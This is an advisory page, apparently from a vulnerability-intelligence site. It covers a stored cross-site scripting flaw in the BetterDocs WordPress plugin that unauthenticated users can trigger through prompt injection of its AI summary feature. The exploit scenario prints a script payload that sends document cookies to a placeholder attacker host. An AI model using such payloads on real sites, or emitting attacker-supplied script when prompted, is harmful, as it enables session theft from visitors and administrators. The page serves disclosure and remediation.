Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI generation endpoint is network-exposed with no authentication (AV:N/PR:N); stored XSS executes in victim browser across scope boundary (S:C/UI:R); impact limited to session data theft and DOM manipulation (C:L/I:L/A:N).
Primary rating from Vendor (WPScan).
CVSS VectorVendor: WPScan
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
5DescriptionCVE.org
The BetterDocs WordPress plugin before 4.5.5 does not sanitise an AI-generated documentation summary before storing and outputting it, and the feature that generates it is exposed to unauthenticated users, allowing them to store a malicious payload via prompt injection that executes in the browser of any visitor who views the affected page, including administrators.
AnalysisAI
Stored cross-site scripting via prompt injection in the BetterDocs WordPress plugin (versions 4.0.0 through 4.5.5) allows unauthenticated attackers to permanently implant malicious JavaScript into documentation pages by manipulating the plugin's AI-generated summary feature. Because the AI output is stored unsanitized and the generation endpoint requires no authentication, an attacker can craft adversarial prompts that cause the AI to produce and persist executable script payloads - payloads that then fire in the browser of every subsequent visitor, including WordPress administrators. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the BetterDocs AI documentation summary generation feature is enabled and that the generation endpoint is reachable over the network - this feature is exposed to unauthenticated users by default in affected versions (4.0.0 through <4.5.5), so no credentials or elevated access are required to plant the payload. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 6.1 Medium score with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N appropriately captures network reachability, zero-authentication exploitation, and scope change - but the practical risk to WordPress site operators exceeds what the numeric score conveys. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An unauthenticated attacker submits a crafted prompt to the BetterDocs AI summary generation endpoint - for example, instructing the AI to include `<script>fetch('https://attacker.com/exfil?c='+btoa(document.cookie))</script>` as part of the generated documentation. The unsanitized AI output is stored to the database and rendered on the documentation page. … |
| Remediation | Update BetterDocs to version 4.5.5 or later, which introduces output sanitization for AI-generated content prior to storage and rendering. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Betterdocs
View allDeserialization of Untrusted Data vulnerability in WPDeveloper BetterDocs.3.3. Rated critical severity (CVSS 9.0), this
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WPDeveloper BetterDocs a
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPDeveloper
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPDeveloper BetterDocs bette
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-44870
GHSA-x6ph-p955-jvgx